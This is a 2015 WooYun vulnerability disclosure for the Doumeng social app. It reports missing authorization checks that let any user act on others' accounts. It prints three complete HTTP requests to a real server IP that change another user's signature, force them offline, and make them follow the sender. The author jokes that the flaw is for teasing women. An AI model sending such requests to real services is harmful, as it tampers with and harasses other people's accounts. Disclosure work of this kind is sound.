当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091874

漏洞标题:逗萌社交APP多处越权操作漏洞

相关厂商:深圳优米信息科技有限公司

漏洞作者: 7z1

提交时间:2015-01-15 16:22

修复时间:2015-04-15 16:24

公开时间:2015-04-15 16:24

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

该漏洞可以利用恶搞,非常任性。给用户带来的困扰以及用户对逗萌产品的信任影响会很大!

详细说明:

可以说,这水平越权漏洞让你为所欲为的调戏你的女神~ 所以称为“任性”不为过!
首先列举几个参数动作:
------------------------------------------------
★ 改签名
POST /HC_APPClient/client-method/updateUserStatus.json HTTP/1.1
Host: 115.29.5.49:80
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Honey/2.0.2 (iPhone; iOS 8.1.2; Scale/2.00)
Accept-Language: zh-Hans;q=1
Accept-Encoding: gzip, deflate
Content-Length: 60
content=%E6%88%91%E5%96%9C%E6%AC%A2%E4%BD%A0&userId=10000
注:将userId改为你想篡改好友的账户ID,直接提交即可更改。
------------------------------------------------
★ 踢人下线(注销用户)
POST /HC_APPClient/client-method/logout.json HTTP/1.1
Host: 115.29.5.49:80
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Honey/2.0.2 (iPhone; iOS 8.1.2; Scale/2.00)
Accept-Language: zh-Hans;q=1
Accept-Encoding: gzip, deflate
Content-Length: 15
userId=10000
------------------------------------------------
★ 让女神关注我
POST /HC_APPClient/client-method/followUser.json HTTP/1.1
Host: 115.29.5.49:80
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Honey/2.0.2 (iPhone; iOS 8.1.2; Scale/2.00)
Accept-Language: zh-Hans;q=1
Accept-Encoding: gzip, deflate
Content-Length: 37
fromUserId=12345&toUserId=1314520
A=12345(我的ID) B=1314520 (女神的ID) AB值交换即可操作对方关注你。
就例举这三个,其中包括上传照片,删照片等等都可以越权操作。

漏洞证明:

1图,小勇是个新建的测试号,改他签名,如图:

12.png


2图,拿我另外的测试号码成功更改小勇的签名!如图:

13.jpg


3图,让女神关注我,如图:

x.PNG


其他我就不证明了,这些已经足够。

修复方案:

加强权限验证

版权声明:转载请注明来源 7z1@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝